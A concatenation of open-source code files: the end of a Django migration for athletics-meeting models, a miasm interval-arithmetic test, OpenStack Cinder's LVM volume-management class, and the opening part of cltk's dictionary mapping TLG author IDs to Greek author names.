('startgeld', models.FloatField(db_column='Startgeld')),
('punktetabelle', models.IntegerField(db_column='Punktetabelle')),
('punkteformel', models.CharField(max_length=20, db_column='Punkteformel')),
('windmessung', models.IntegerField(db_column='Windmessung')),
('info', models.CharField(max_length=50, db_column='Info', blank=True)),
('zeitmessung', models.IntegerField(db_column='Zeitmessung')),
('zeitmessungauto', models.IntegerField(db_column='ZeitmessungAuto')),
('mehrkampfcode', models.IntegerField(db_column='Mehrkampfcode')),
('mehrkampfende', models.IntegerField(db_column='Mehrkampfende')),
('mehrkampfreihenfolge', models.IntegerField(db_column='Mehrkampfreihenfolge')),
('xkategorie_svm', models.IntegerField(db_column='xKategorie_svm')),
('onlineid', models.IntegerField(db_column='OnlineId')),
('typaenderung', models.CharField(max_length=50, db_column='TypAenderung')),
('meeting', models.ForeignKey(related_name='wettkaempfe', db_column='xMeeting', to='main.Meeting')),
('kategorie', models.ForeignKey(to='main.Kategorie', db_column='xKategorie')),
('disziplin', models.ForeignKey(to='main.DisziplinDe', db_column='xDisziplin')),
],
options={
'db_table': 'wettkampf',
'verbose_name_plural': 'wettk\xe4mpfe',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='runde',
name='wettkampf',
field=models.ForeignKey(related_name='runden', db_column='xWettkampf', to='main.Wettkampf'),
preserve_default=True,
),
migrations.AddField(
model_name='start',
name='wettkampf',
field=models.ForeignKey(related_name='starts', db_column='xWettkampf', to='main.Wettkampf'),
preserve_default=True,
),
migrations.CreateModel(
name='Zeitmessung',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column='xZeitmessung')),
('omega_verbindung', models.CharField(max_length=5, db_column='OMEGA_Verbindung')),
('omega_pfad', models.CharField(max_length=255, db_column='OMEGA_Pfad')),
('omega_server', models.CharField(max_length=255, db_column='OMEGA_Server')),
('omega_benutzer', models.CharField(max_length=50, db_column='OMEGA_Benutzer')),
('omega_passwort', models.CharField(max_length=50, db_column='OMEGA_Passwort')),
('omega_ftppfad', models.CharField(max_length=255, db_column='OMEGA_Ftppfad')),
('omega_sponsor', models.CharField(max_length=255, db_column='OMEGA_Sponsor')),
('alge_typ', models.CharField(max_length=20, db_column='ALGE_Typ')),
('alge_ftppfad', models.CharField(max_length=255, db_column='ALGE_Ftppfad')),
('alge_passwort', models.CharField(max_length=50, db_column='ALGE_Passwort')),
('alge_benutzer', models.CharField(max_length=50, db_column='ALGE_Benutzer')),
('alge_server', models.CharField(max_length=255, db_column='ALGE_Server')),
('alge_pfad', models.CharField(max_length=255, db_column='ALGE_Pfad')),
('alge_verbindung', models.CharField(max_length=5, db_column='ALGE_Verbindung')),
('xmeeting', models.IntegerField(db_column='xMeeting')),
],
options={
'db_table': 'zeitmessung',
},
bases=(models.Model,),
),
migrations.AlterField(
model_name='athlet',
name='geburtstag',
field=models.DateField(null=True, db_column='Geburtstag', blank=True),
),
migrations.AlterField(
model_name='meeting',
name='datumvon',
field=models.DateField(default=datetime.date(2015, 3, 4), db_column='DatumVon'),
),
]
|
gpl-2.0
|
amohanta/miasm
|
test/core/interval.py
|
7
|
3822
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from miasm2.core.interval import *
from random import randint
from pdb import pm
i1 = interval([(1, 3)])
i2 = interval([(2, 5)])
i3 = interval([(3, 5)])
i4 = interval([(5, 8)])
i5 = interval([(1, 5)])
i6 = interval([(1, 3), (5, 8)])
i7 = interval([(2, 8)])
i8 = interval([(1, 8)])
i9 = interval([(4, 5)])
i10 = interval([(1, 1)])
i11 = interval([(1, 2)])
i12 = interval([(2, 2)])
i13 = interval([(2, 4)])
i14 = interval([(0, 1), (3, 5), (7, 10)])
i15 = interval([(0, 12)])
i16 = interval([(2, 8)])
i_empty = interval()
assert(repr(i_empty) == '[]')
assert(interval(i1) == i1)
i1.cannon()
i1.cannon()
assert(cmp_interval(i1.intervals[0], i2.intervals[0]) == INT_JOIN)
assert(cmp_interval(i1.intervals[0], i3.intervals[0]) == INT_JOIN)
assert(cmp_interval(i1.intervals[0], i4.intervals[0]) == INT_DISJOIN)
assert(cmp_interval(i2.intervals[0], i3.intervals[0]) == INT_B_IN_A)
assert(cmp_interval(i3.intervals[0], i2.intervals[0]) == INT_A_IN_B)
assert(cmp_interval(i1.intervals[0], i1.intervals[0]) == INT_EQ)
assert(cmp_interval(i1.intervals[0], i9.intervals[0]) == INT_JOIN_AB)
assert(cmp_interval(i9.intervals[0], i1.intervals[0]) == INT_JOIN_BA)
assert((i1 in i2) is False)
assert((i2 in i1) is False)
assert((i1 in i3) is False)
assert((i2 in i3) is False)
assert((i3 in i2))
assert((i2 in i3) is False)
assert((i3 in i14))
assert(interval.cannon_list(i1.intervals) == i1.intervals)
assert(i1 + i2 == i5)
assert(i1 + i3 == i5)
assert(i1 + i4 == i6)
assert(i2 + i3 == i2)
assert(i2 + i4 == i7)
assert(i1 + i2 + i4 == i8)
assert(i1 - i2 == i10)
assert(i1 - i3 == i11)
assert(i1 - i4 == i1)
assert(i2 - i3 == i12)
assert(i2 - i4 == i13)
assert(i8 - i1 == interval([(4, 8)]))
assert(i8 - i2 == interval([(1, 1), (6, 8)]))
assert(i10 + i12 == i11)
assert(i1 - i1 == interval())
assert(i6 - i6 == interval())
assert(i6 - i6 - i1 == interval())
assert(i1 - i10 == interval([(2, 3)]))
assert(i1 & i1 == i1)
assert(i1 & i2 == interval([(2, 3)]))
assert(i1 & i3 == interval([(3, 3)]))
assert(i3 & i1 == interval([(3, 3)]))
assert(i1 & i4 == interval([]))
assert(i4 & i1 == interval([]))
assert(i1 & i5 == i1)
assert(i5 & i1 == i1)
assert(i1 & i6 == i1)
assert(i5 & i13 == i13)
assert(i6 & i6 == i6)
assert(i14 & i15 == i14)
assert(i15 & i14 == i14)
assert(i14 & i16 == interval([(3, 5), (7, 8)]))
x1 = [(7, 87), (76, 143), (94, 129), (79, 89), (46, 100)]
assert(interval(x1) == interval([(7, 143)]))
x2 = [(11, 16), (35, 74), (18, 114), (91, 188), (3, 75)]
assert(interval(x2) == interval([(3, 188)]))
i1.hull()
i1.show(dry_run=True)
assert(i_empty.hull() == (None, None))
def gen_random_interval(l=100):
r = []
for j in xrange(5):
a = randint(0, l)
b = a + randint(0, l)
r.append((a, b))
return r
def check_add(r1, r2):
i_sum = interval(r1) + interval(r2)
for a, b in r1 + r2:
for i in xrange(a, b + 1):
assert(i in i_sum)
def check_sub(r1, r2):
i1 = interval(r1)
i2 = interval(r2)
i_sub = i1 - i2
for a, b in r1:
for i in xrange(a, b + 1):
if i in i2:
assert(i not in i_sub)
else:
assert(i in i_sub)
def check_and(r1, r2):
i1 = interval(r1)
i2 = interval(r2)
i_and = i1 & i2
for a, b in r1:
for i in xrange(a, b + 1):
if i in i2:
assert(i in i_and)
else:
assert(i not in i_and)
for i in xrange(1000):
r1 = gen_random_interval()
r2 = gen_random_interval()
r3 = gen_random_interval()
check_add(r1, r2)
check_sub(r1, r2)
check_and(r1, r2)
a = interval(r1)
b = interval(r2)
c = interval(r3)
assert((a & b) - c == a & (b - c) == (a - c) & (b - c))
assert(a - (b & c) == (a - b) + (a - c))
|
gpl-2.0
|
maelnor/cinder
|
cinder/brick/local_dev/lvm.py
|
1
|
13620
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
LVM class for performing LVM operations.
"""
import math
import re
from itertools import izip
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
from cinder.openstack.common import processutils as putils
LOG = logging.getLogger(__name__)
class VolumeGroupNotFound(Exception):
def __init__(self, vg_name):
message = (_('Unable to find Volume Group: %s') % vg_name)
super(VolumeGroupNotFound, self).__init__(message)
class VolumeGroupCreationFailed(Exception):
def __init__(self, vg_name):
message = (_('Failed to create Volume Group: %s') % vg_name)
super(VolumeGroupCreationFailed, self).__init__(message)
class LVM(object):
"""LVM object to enable various LVM related operations."""
def __init__(self,
vg_name,
create_vg=False,
physical_volumes=None,
lvm_type='default',
executor=putils.execute):
"""Initialize the LVM object.
The LVM object is based on an LVM VolumeGroup, one instantiation
for each VolumeGroup you have/use.
:param vg_name: Name of existing VG or VG to create
:param create_vg: Indicates the VG doesn't exist
and we want to create it
:param physical_volumes: List of PVs to build VG on
"""
self.vg_name = vg_name
self.pv_list = []
self.lv_list = []
self.vg_size = 0
self.vg_free_space = 0
self.vg_lv_count = 0
self.vg_uuid = None
self._execute = executor
self.vg_thin_pool = None
if create_vg and physical_volumes is not None:
self.pv_list = physical_volumes
try:
self._create_vg(physical_volumes)
except putils.ProcessExecutionError as err:
LOG.exception(_('Error creating Volume Group'))
LOG.error(_('Cmd :%s') % err.cmd)
LOG.error(_('StdOut :%s') % err.stdout)
LOG.error(_('StdErr :%s') % err.stderr)
raise VolumeGroupCreationFailed(vg_name=self.vg_name)
if self._vg_exists() is False:
LOG.error(_('Unable to locate Volume Group %s') % vg_name)
raise VolumeGroupNotFound(vg_name=vg_name)
if lvm_type == 'thin':
pool_name = "%s-pool" % self.vg_name
if self.get_volume(pool_name) is None:
self.create_thin_pool(pool_name)
else:
self.vg_thin_pool = pool_name
def _size_str(self, size_in_g):
if '.00' in size_in_g:
size_in_g = size_in_g.replace('.00', '')
if int(size_in_g) == 0:
return '100m'
return '%sg' % size_in_g
def _vg_exists(self):
"""Simple check to see if VG exists.
:returns: True if vg specified in object exists, else False
"""
exists = False
cmd = ['vgs', '--noheadings', '-o', 'name']
(out, err) = self._execute(*cmd, root_helper='sudo', run_as_root=True)
if out is not None:
volume_groups = out.split()
if self.vg_name in volume_groups:
exists = True
return exists
def _create_vg(self, pv_list):
cmd = ['vgcreate', self.vg_name, ','.join(pv_list)]
self._execute(*cmd, root_helper='sudo', run_as_root=True)
def _get_vg_uuid(self):
(out, err) = self._execute('vgs', '--noheadings',
'-o uuid', self.vg_name)
if out is not None:
return out.split()
else:
return []
@staticmethod
def supports_thin_provisioning():
"""Static method to check for thin LVM support on a system.
:returns: True if supported, False otherwise
"""
cmd = ['vgs', '--version']
(out, err) = putils.execute(*cmd, root_helper='sudo', run_as_root=True)
lines = out.split('\n')
for line in lines:
if 'LVM version' in line:
version_list = line.split()
version = version_list[2]
if '(2)' in version:
version = version.replace('(2)', '')
version_tuple = tuple(map(int, version.split('.')))
if version_tuple >= (2, 2, 95):
return True
return False
@staticmethod
def get_all_volumes(vg_name=None):
"""Static method to get all LV's on a system.
:param vg_name: optional, gathers info for only the specified VG
:returns: List of Dictionaries with LV info
"""
cmd = ['lvs', '--noheadings', '--unit=g', '-o', 'vg_name,name,size']
if vg_name is not None:
cmd += [vg_name]
(out, err) = putils.execute(*cmd, root_helper='sudo', run_as_root=True)
lv_list = []
if out is not None:
volumes = out.split()
for vg, name, size in izip(*[iter(volumes)] * 3):
lv_list.append({"vg": vg, "name": name, "size": size})
return lv_list
def get_volumes(self):
"""Get all LV's associated with this instantiation (VG).
:returns: List of Dictionaries with LV info
"""
self.lv_list = self.get_all_volumes(self.vg_name)
return self.lv_list
def get_volume(self, name):
"""Get reference object of volume specified by name.
:returns: dict representation of Logical Volume if exists
"""
ref_list = self.get_volumes()
for r in ref_list:
if r['name'] == name:
return r
@staticmethod
def get_all_physical_volumes(vg_name=None):
"""Static method to get all PVs on a system.
:param vg_name: optional, gathers info for only the specified VG
:returns: List of Dictionaries with PV info
"""
cmd = ['pvs', '--noheadings',
'--unit=g',
'-o', 'vg_name,name,size,free',
'--separator', ':']
if vg_name is not None:
cmd += [vg_name]
(out, err) = putils.execute(*cmd, root_helper='sudo', run_as_root=True)
pv_list = []
if out is not None:
pvs = out.split()
for pv in pvs:
fields = pv.split(':')
pv_list.append({'vg': fields[0],
'name': fields[1],
'size': fields[2],
'available': fields[3]})
return pv_list
def get_physical_volumes(self):
"""Get all PVs associated with this instantiation (VG).
:returns: List of Dictionaries with PV info
"""
self.pv_list = self.get_all_physical_volumes(self.vg_name)
return self.pv_list
@staticmethod
def get_all_volume_groups(vg_name=None):
"""Static method to get all VGs on a system.
:param vg_name: optional, gathers info for only the specified VG
:returns: List of Dictionaries with VG info
"""
cmd = ['vgs', '--noheadings',
'--unit=g', '-o',
'name,size,free,lv_count,uuid',
'--separator', ':']
if vg_name is not None:
cmd += [vg_name]
(out, err) = putils.execute(*cmd, root_helper='sudo', run_as_root=True)
vg_list = []
if out is not None:
vgs = out.split()
for vg in vgs:
fields = vg.split(':')
vg_list.append({'name': fields[0],
'size': fields[1],
'available': fields[2],
'lv_count': fields[3],
'uuid': fields[4]})
return vg_list
def update_volume_group_info(self):
"""Update VG info for this instantiation.
Used to update member fields of object and
provide a dict of info for caller.
:returns: Dictionaries of VG info
"""
vg_list = self.get_all_volume_groups(self.vg_name)
if len(vg_list) != 1:
LOG.error(_('Unable to find VG: %s') % self.vg_name)
raise VolumeGroupNotFound(vg_name=self.vg_name)
self.vg_size = vg_list[0]['size']
self.vg_free_space = vg_list[0]['available']
self.vg_lv_count = vg_list[0]['lv_count']
self.vg_uuid = vg_list[0]['uuid']
if self.vg_thin_pool is not None:
self.vg_size = self.vg_size
return vg_list[0]
def create_thin_pool(self, name=None, size_str=0):
"""Creates a thin provisioning pool for this VG.
The syntax here is slightly different than the default
lvcreate -T, so we'll just write a custom cmd here
and do it.
:param name: Name to use for pool, default is "<vg-name>-pool"
:param size_str: Size to allocate for pool, default is entire VG
"""
if not self.supports_thin_provisioning():
LOG.error(_('Requested to setup thin provisioning, '
'however current LVM version does not '
'support it.'))
return None
if name is None:
name = '%s-pool' % self.vg_name
if size_str == 0:
self.update_volume_group_info()
size_str = self.vg_size
# NOTE(jdg): lvcreate will round up extents
# to avoid issues, let's chop the size off to an int
size_str = re.sub(r'\.\d*', '', size_str)
pool_path = '%s/%s' % (self.vg_name, name)
cmd = ['lvcreate', '-T', '-L', size_str, pool_path]
putils.execute(*cmd,
root_helper='sudo',
run_as_root=True)
self.vg_thin_pool = pool_path
def create_volume(self, name, size_str, lv_type='default', mirror_count=0):
"""Creates a logical volume on the object's VG.
:param name: Name to use when creating Logical Volume
:param size_str: Size to use when creating Logical Volume
:param lv_type: Type of Volume (default or thin)
:param mirror_count: Use LVM mirroring with specified count
"""
size_str = self._size_str(size_str)
cmd = ['lvcreate', '-n', name, self.vg_name]
if lv_type == 'thin':
pool_path = '%s/%s' % (self.vg_name, self.vg_thin_pool)
cmd = ['lvcreate', '-T', '-V', size_str, '-n', name, pool_path]
else:
cmd = ['lvcreate', '-n', name, self.vg_name, '-L', size_str]
if mirror_count > 0:
cmd += ['-m', mirror_count, '--nosync']
terras = int(size_str[:-1]) / 1024.0
if terras >= 1.5:
rsize = int(2 ** math.ceil(math.log(terras) / math.log(2)))
# NOTE(vish): Next power of two for region size. See:
# http://red.ht/U2BPOD
cmd += ['-R', str(rsize)]
self._execute(*cmd,
root_helper='sudo',
run_as_root=True)
def create_lv_snapshot(self, name, source_lv_name, lv_type='default'):
"""Creates a snapshot of a logical volume.
:param name: Name to assign to new snapshot
:param source_lv_name: Name of Logical Volume to snapshot
:param lv_type: Type of LV (default or thin)
"""
source_lvref = self.get_volume(source_lv_name)
if source_lvref is None:
LOG.error(_("Unable to find LV: %s") % source_lv_name)
return False
cmd = ['lvcreate', '--name', name,
'--snapshot', '%s/%s' % (self.vg_name, source_lv_name)]
if lv_type != 'thin':
size = source_lvref['size']
cmd += ['-L', size]
self._execute(*cmd,
root_helper='sudo',
run_as_root=True)
def delete(self, name):
"""Delete logical volume or snapshot.
:param name: Name of LV to delete
"""
self._execute('lvremove',
'-f',
'%s/%s' % (self.vg_name, name),
root_helper='sudo', run_as_root=True)
def revert(self, snapshot_name):
"""Revert an LV from snapshot.
:param snapshot_name: Name of snapshot to revert
"""
self._execute('lvconvert', '--merge',
snapshot_name, root_helper='sudo',
run_as_root=True)
def lv_has_snapshot(self, name):
out, err = self._execute('lvdisplay', '--noheading',
'-C', '-o', 'Attr',
'%s/%s' % (self.vg_name, name))
if out:
out = out.strip()
if (out[0] == 'o') or (out[0] == 'O'):
return True
return False
|
apache-2.0
|
kylepjohnson/cltk
|
src/cltk/corpora/grc/tlg/id_author.py
|
4
|
63335
|
ID_AUTHOR = {
"2434": "Aelius Dius Hist.",
"2035": "Athanasius Theol.",
"2012": "Acta Eupli",
"1578": "Phaenias Phil.",
"1220": "Batrachomyomachia",
"1222": "Beros(s)us Astrol. et Hist.",
"0474": "Magnes Comic.",
"0559": "Heron Mech.",
"4138": "Ephraem Syrus Theol.",
"1639": "Pseudo-Auctores Hellenistae (PsVTGr)",
"4075": "Marinus Phil.",
"1413": "Heraclitus Paradox.",
"2120": "Panteleius Epic.",
"2595": "Philo Paradox.",
"2744": "Historia Monachorum In Aegypto",
"1397": "Hegesippus Hist.",
"1634": "Prodicus Soph.",
"2566": "[Agathon] Hist.",
"4291": "Verba In Scripturis De Christo",
"0373": "Melanippides Lyr.",
"2648": "Adespota Papyracea (SH)",
"1817": "Fragmenta Anonyma (PsVTGr)",
"1871": "Bion Hist.",
"1105": "Timaeus Praxidas Astrol.",
"0552": "Archimedes Geom.",
"1407": "Heraclides Lembus Hist.",
"0766": "Alcmaeon Phil.",
"1725": "Theophilus Apol.",
"2391": "Hippostratus Hist.",
"0446": "Dioxippus Comic.",
"2650": "Arrianus Epic.",
"2371": "Chronicon Paschale",
"2657": "Martyrium Ignatii",
"0673": "Aeschines Socraticus Phil.",
"4290": "Lexicon Artis Grammaticae",
"1527": "Nepualius Med. et Phil.",
"2109": "Pseudo-Macarius Scr. Eccl.",
"2571": "Hierocles Phil.",
"1149": "Antonini Pii Imperatoris Epistula",
"0252": "Hermippus Comic.",
"1227": "Blaesus Comic.",
"0726": "Palladius Med.",
"1836": "Anonymi Aulodia",
"1324": "Dionysius Hist.",
"0562": "Marcus Aurelius Antoninus Imperator Phil.",
"4339": "Archelaus Alchem. et Poeta",
"0644": "Aristophanes Gramm.",
"1351": "Epigoni",
"4032": "Anonymi In Aristotelis Librum Primum Analyticorum Posteriorum Commentarium",
"4018": "Asclepius Phil.",
"1843": "Nicomachus Trag.",
"0558": "Hellenica",
"1163": "Claudius Apollinarius Apol.",
"2482": "Daimachus Hist.",
"2397": "Boethus Phil.",
"9009": "Michael Apostolius Paroemiogr.",
"0303": "Phrynichus Trag.",
"1219": "Bato Hist. et Rhet.",
"0647": "Triphiodorus Epic. et Gramm.",
"2547": "Antigonus",
"5004": "Epimerismi",
"1354": "Ergias Hist.",
"1760": "Gaius Suetonius Tranquillus Gramm. et Hist.",
"0721": "Anonymi Medici Med.",
"1172": "Arcesilaus Phil.",
"4287": "Etymologia Alphabeti",
"0399": "Eudoxus Comic.",
"0062": "Lucianus Soph.",
"1489": "Megasthenes Hist.",
"4303": "Lexica In Opera Gregorii Nazianzeni",
"2956": "Sextus Julius Africanus Hist.",
"2894": "Constitutiones Apostolorum",
"0638": "Flavius Philostratus Soph.",
"0040": "Calani Epistula",
"0291": "Alcman Lyr.",
"0337": "Python Trag.",
"0492": "Philonides Comic.",
"1846": "Spintharus Trag.",
"0077": "Periplus Maris Magni",
"1923": "Stesimbrotus Hist.",
"2063": "Gregorius Thaumaturgus Scr. Eccl.",
"0635": "Zeno Phil.",
"0417": "Archippus Comic.",
"0695": "Alcimus Hist.",
"1752": "Xenagoras Geogr. et Hist.",
"0346": "Pompeius Macer [Trag.]",
"0509": "[Myia] Phil.",
"0398": "Simylus Comic.",
"1194": "Aristonicus Gramm.",
"0257": "Philiscus Rhet.",
"0324": "Patrocles Trag.",
"3139": "Laonicus Chalcocondyles Hist.",
"2703": "Anna Comnena Hist.",
"5009": "Scholia In Aeschinem",
"0313": "Theognis Trag.",
"2237": "Theodorus Math.",
"2277": "Hypermenes Hist.",
"4171": "Anonymi In Oppiani Opera",
"0547": "Anaximenes Hist. et Rhet.",
"2995": "Orus Gramm.",
"2331": "Myrsilus Hist.",
"4346": "Menecrates Hist.",
"4374": "Anonymi De Astrologia Dialogus Astrol.",
"5030": "Scholia In Lycophronem",
"0751": "Pseudo-Hippocrates Med.",
"2644": "Sminthes Astron.",
"1321": "Diogenes Phil.",
"1833": "Pratinas Trag.",
"0525": "Pausanias Perieg.",
"1890": "Moderatus Phil.",
"2051": "Himerius Soph.",
"1805": "Vitae Homeri",
"1439": "Hermarchus Phil.",
"2307": "Artemon Hist.",
"0368": "Cydias Lyr.",
"0582": "Paradoxographus Vaticanus",
"1123": "Andron Hist.",
"2970": "Severus Phil.",
"2236": "Eutropius Hist.",
"0458": "Eubulus Comic.",
"0042": "Alexandri Magni Epistulae",
"1907": "Cratippus Hist.",
"0201": "Isyllus Lyr.",
"0404": "Amphis Comic.",
"4174": "Paraphrases In Dionysium Periegetam",
"1587": "Philiades Eleg.",
"0319": "Critias Eleg., Phil. et Trag.",
"1596": "Philolaus Phil.",
"2011": "Martyrium Agapae, Irenae, Chionae Et Sodalium",
"4324": "Synesius Alchem.",
"0730": "Meletius Med.",
"0022": "Nicander Epic.",
"1801": "Parodica Anonyma",
"5045": "Anonymi In Aphthonium Rhet.",
"1260": "[Chersias] Epic.",
"1257": "Charinus Choliamb.",
"2696": "Theodorus Poeta",
"1693": "Sphaerus Phil.",
"1204": "Athenaeus Mech.",
"3143": "Georgius Sphrantzes Hist.",
"3100": "Nicolaus I Mysticus Theol. et Epist.",
"0633": "[Lysis] Phil.",
"2216": "Aristippus Hist.",
"0545": "Claudius Aelianus Soph.",
"1237": "[Callicratidas] Phil.",
"1436": "[Hippodamus] Phil.",
"1726": "Theopompus Epic.",
"0540": "Lysias Orat.",
"1241": "Carmen Naupactium",
"9008": "Macarius Chrysocephalus Paroemiogr.",
"1627": "Polycrates Hist.",
"0571": "Aristocles Paradox.",
"0473": "Machon Comic.",
"2182": "Staphylus Hist.",
"1361": "Eumedes Comic.",
"4237": "Joannes Argyropulus Gramm.",
"4301": "Lexicon Rhetoricum Cantabrigiense",
"0256": "Panarces Scriptor Aenigmatum",
"1604": "Phocylides Eleg. et Gnom.",
"1797": "Choliambica Adespota (ALG)",
"1746": "Valentinus Gnost.",
"0074": "Flavius Arrianus Hist. et Phil.",
"1785": "Paramonus Comic.",
"2002": "Anonymus Seguerianus Rhet.",
"4338": "Theophrastus Alchem. et Poeta",
"2654": "Physiologus",
"0039": "Mithridatis Epistula",
"0500": "Posidippus Comic.",
"2173": "Antileon Hist.",
"0390": "Martyrium Carpi, Papyli Et Agathonicae",
"4326": "Pappus Alchem.",
"1978": "Leo Hist.",
"2148": "Aristodemus Hist.",
"1463": "Liber Enoch",
"2313": "Antisthenes Phil.",
"1228": "[Boeo] Epic.",
"2061": "Asterius Sophista Scr. Eccl.",
"4390": "Democles Hist.",
"1602": "Philoxenus Gramm.",
"4292": "Lexicon De Atticis Nominibus",
"1545": "Ocellus Phil.",
"2055": "Serenus Geom.",
"3156": "Anonymi Exegesis In Hesiodi Theogoniam",
"2968": "Monimus Phil.",
"1212": "Atridarum Reditus",
"0241": "Aristoxenus [Comic.]",
"0043": "Amasis Epistulae",
"1511": "Mimnermus Trag.",
"0031": "Novum Testamentum, New Testament",
"2949": "Acta Barnabae",
"2053": "Paulus Astrol.",
"0388": "Acta Pauli",
"4036": "Proclus Phil.",
"1584": "Pherecydes Hist.",
"0889": "Timesitheus Trag.",
"0661": "Archigenes Med.",
"1783": "Callicrates Comic.",
"2022": "Gregorius Nazianzenus Theol.",
"2019": "Pelagius Alchem.",
"0317": "Acta Joannis",
"0092": "Anonymi Geographiae Expositio Compendiaria",
"0687": "Agaclytus Hist.",
"5026": "Scholia In Homerum",
"4236": "Trophonius Rhet. et Soph.",
"1868": "Damastes Hist.",
"1368": "Evangelium Ebionitum",
"0511": "Theognetus Comic.",
"4097": "Etymologicum Genuinum",
"1338": "Dosiadas Hist.",
"0693": "Albinus Phil.",
"2946": "Priscus Hist. et Rhet.",
"0483": "Nicophon Comic.",
"0097": "Diogenianus Gramm.",
"0508": "Strattis Comic.",
"2247": "Petron Phil.",
"2314": "Diogenes Phil.",
"2158": "Eutychianus Hist.",
"2892": "Maximus Confessor Theol.",
"2384": "Hermias Hist.",
"1390": "Hecataeus Hist.",
"1555": "Pancrates Epic.",
"9022": "Joannes Tzetzes Gramm. et Poeta",
"0059": "Plato Phil.",
"1795": "Chaerion Comic.",
"2546": "Publius Rutilius Rufus Hist.",
"2015": "Testamentum XL Martyrum",
"2001": "Themistius Phil. et Rhet.",
"9006": "Gregorius Paroemiogr.",
"0066": "Dicaearchus Phil.",
"3181": "Nicephorus II Phocas Imperator Tact.",
"1566": "Parmeno Iamb.",
"2945": "Gnomologium Vaticanum",
"4149": "Sophronius Gramm.",
"2000": "Plotinus Phil.",
"0279": "Discipulorum Cantiuncula",
"0445": "Dionysius Comic.",
"2157": "Magnus Hist.",
"1648": "Pyrgion Hist.",
"4017": "Syrianus Phil.",
"0615": "Aspasius Phil.",
"1521": "Vita Et Sententiae Secundi",
"1782": "Augeas Comic.",
"3039": "Joannes Galenus Gramm.",
"0234": "Elegiaca Adespota (IEG)",
"2618": "Didymarchus Poeta",
"0555": "Clemens Alexandrinus Theol.",
"1633": "Praxiteles [Epigr.]",
"1179": "[Arimnestus] Phil.",
"1320": "Diogenes Phil.",
"0401": "Alexander Comic.",
"1136": "Anonymus Presbyter Scr. Eccl.",
"0344": "Melanthius Trag.",
"1970": "Silenus Hist.",
"2115": "Hippolytus Scr. Eccl.",
"4395": "Menetor Hist.",
"4193": "Anonymi In Aristotelis Sophisticos Elenchos Phil.",
"1242": "Canon Librorum",
"1867": "Crito Hist.",
"2533": "Timolaus Hist.",
"2333": "Possis Hist.",
"1174": "Archemachus Hist.",
"2412": "Androetas Hist.",
"1551": "Oracula Sibyllina",
"0442": "Dexicrates Comic.",
"0465": "Heniochus Comic.",
"1311": "Didache XII Apostolorum",
"2020": "Theodosius Gramm.",
"0353": "[Sclerias] Trag.",
"0420": "Aristonymus Comic.",
"0825": "Melito Trag.",
"1792": "Biottus Comic.",
"0240": "Hermolochus Lyr.",
"2187": "Posidonius Hist.",
"1344": "Epica Adespota (CA)",
"0514": "Thugenides Comic.",
"0489": "Philetaerus Comic.",
"0348": "Biotus Trag.",
"0451": "Epicrates Comic.",
"1369": "Evangelium Mariae",
"0506": "Stephanus Comic.",
"1406": "Heraclides Hist.",
"4337": "Heliodorus Alchem. et Poeta",
"2587": "Ariston Phil.",
"3142": "Georgius Pachymeres Hist.",
"1171": "Apollonius Scr. Eccl.",
"5039": "Scholia In Thucydidem",
"0485": "Ophelio Comic.",
"2317": "Hermias Phil.",
"1157": "Apocalypsis Esdrae",
"2615": "Daphitas Gramm. vel Soph.",
"0554": "Chariton Scr. Erot.",
"2219": "Amelesagoras Hist.",
"0250": "Euclides Comic. vel Iamb.",
"0488": "Philemon Junior Comic.",
"2762": "Gennadius I Scr. Eccl.",
"0533": "Callimachus Philol.",
"0209": "Seleucus Lyr.",
"0383": "Alcaeus Lyr.",
"0696": "Alcmaeonis",
"2681": "Diodorus Phil.",
"0298": "Eumelus Epic.",
"1274": "Cleobulus Epigr. et Lyr.",
"1329": "Dionysius Scr. Eccl.",
"0505": "Sotades Comic.",
"1231": "[Bryson] Phil.",
"0522": "Pisander Epic.",
"2021": "Epiphanius Scr. Eccl.",
"1523": "Myron Hist.",
"1188": "Aristocles Phil.",
"1259": "[Charondas Nomographus] [Phil.]",
"4302": "Lexicon Patmense",
"5013": "Scholia In Aratum",
"0469": "Laon Comic.",
"1362": "[Eurytus] Phil.",
"2228": "Menestor Phil.",
"1186": "Aristobulus Judaeus Phil.",
"0374": "Licymnius Lyr.",
"2638": "Philo Poeta",
"0396": "Euphanes Comic.",
"1391": "Hegemon Epic.",
"2466": "Dionysius Hist.",
"2127": "Troilus Soph.",
"4361": "Apomasar Astrol.",
"5034": "Scholia In Pindarum",
"0014": "Demosthenes Orat.",
"2049": "Sallustius Phil.",
"1815": "Sappho et Alcaeus Lyr.",
"1546": "Oechaliae Halosis",
"2040": "Basilius Theol.",
"3027": "Joannes Doxapatres Rhet.",
"0698": "Alexander Rhet.",
"1766": "Tatianus Apol.",
"0561": "Longus Scr. Erot.",
"4311": "Etymologicum Symeonis",
"1835": "Agroetas Hist.",
"2042": "Origenes Theol.",
"0369": "Telesilla Lyr.",
"1643": "Ptolemaeus Gramm.",
"0232": "Archilochus Eleg. et Iamb.",
"4099": "Etymologicum Magnum",
"4016": "Ammonius Phil.",
"4034": "Michael Phil.",
"0750": "Heliodorus Trag.",
"0616": "Polyaenus Rhet.",
"4201": "Joannes Chortasmenus Phil.",
"2548": "Promathion Hist.",
"0601": "[Zaleucus Nomographus] [Phil.]",
"1121": "Anaximenis Milesii Epistulae",
"3063": "Joannes Scylitzes Hist.",
"1599": "Philo Mech.",
"2282": "Melisseus Hist.",
"1229": "[Boeus] Epic.",
"1626": "Polycrates Scr. Eccl.",
"1156": "Apocalypsis Eliae",
"2010": "Martyrium Dasii",
"4340": "Salmanas Alchem.",
"0263": "Solon Nomographus et Poeta",
"0343": "Ezechiel Trag.",
"1381": "Fragmentum Synodicae Epistulae Concilii Caesariensis",
"2234": "Oenopides Phil.",
"2608": "Archebulus Poeta",
"4334": "[Isis Prophetissa] Alchem.",
"4076": "Menander Protector Hist.",
"0009": "Sappho Lyr.",
"0244": "Cleobulina Scriptor Aenigmatum",
"2621": "Diophilus vel Diophila Poeta",
